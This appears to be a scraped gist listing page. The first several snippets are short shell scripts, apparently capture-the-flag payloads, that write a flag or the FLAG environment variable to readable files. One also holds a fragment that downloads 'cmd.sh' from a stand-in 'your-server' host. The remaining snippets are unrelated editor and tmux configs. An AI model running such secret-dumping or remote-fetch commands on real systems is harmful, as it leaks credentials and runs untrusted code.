This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| /readFlag > /app/files/flag.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| /readFlag > /app/files/flag.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| /readFlag > /app/files |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| /readFlag > /app/files |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| printenv FLAG > /tmp/flag.txt | |
| chmod 644 /tmp/flag.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| printenv FLAG > /tmp/flag.txt | |
| chmod 644 /tmp/flag.txt | |
| -o /tmp/.cmd http://your-server/cmd.sh |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| monitor=eDP-1,2160x1440@60,0,1 | |
| $volume = bash ~/.config/hypr/scripts/volume | |
| $brightness = bash ~/.config/hypr/scripts/brightness | |
| $lock = swaylock | |
| $powerMenu = wlogout | |
| # ----==###==---- | |
| # EXECS | |
| # ----==###==---- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| return { | |
| "nvim-neo-tree/neo-tree.nvim", | |
| version = "*", | |
| dependencies = { | |
| "nvim-lua/plenary.nvim", | |
| "nvim-tree/nvim-web-devicons", -- not strictly required, but recommended | |
| "MunifTanjim/nui.nvim", | |
| }, | |
| config = function () | |
| -- Unless you are still migrating, remove the deprecated commands from v1.x |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --[[ | |
| ===================================================================== | |
| ==================== READ THIS BEFORE CONTINUING ==================== | |
| ===================================================================== | |
| Kickstart.nvim is *not* a distribution. | |
| Kickstart.nvim is a template for your own configuration. | |
| The goal is that you can read every line of code, top-to-bottom, and understand |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Change leader key to Space | |
| unbind C-b | |
| unbind C-Space | |
| set -g prefix C-Space | |
| bind C-Space send-prefix | |
| set -ga terminal-overrides ",xterm-256color*:Tc" | |
| set -s escape-time 0 | |
| set -g status-style 'bg=#333333 fg=#5eacd3' |
NewerOlder